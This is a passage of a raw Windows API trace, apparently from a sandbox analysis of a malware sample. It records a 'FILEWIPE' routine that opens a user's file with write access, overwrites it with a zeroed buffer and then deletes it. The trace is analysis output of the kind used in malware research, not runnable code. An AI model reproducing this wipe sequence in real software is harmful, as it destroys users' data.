| out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.779] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.779] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0031.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.780] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.781] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x54d03240, ftLastWriteTime.dwHighDateTime=0x1d5c378, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x0, dwReserved1=0x777648, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0x7c2100 [0031.781] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.782] CharLowerBuffW (in: lpsz="byte[55684]", cchLength=0xb | out: lpsz="byte[55684]") returned 0xb [0031.782] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.782] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.782] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.782] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.783] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.783] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.783] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\n0tvrnehfm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x942998 | out: hHeap=0x770000) returned 1 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.785] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.786] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.786] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0031.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88ca30 [0031.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88ca30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0031.787] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.787] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.787] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.787] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.787] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.787] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0031.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.788] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0031.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.788] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.788] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.788] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.788] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFilePart=0x0) returned 0x4c [0031.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x12d570e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0x7c2100 [0031.789] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 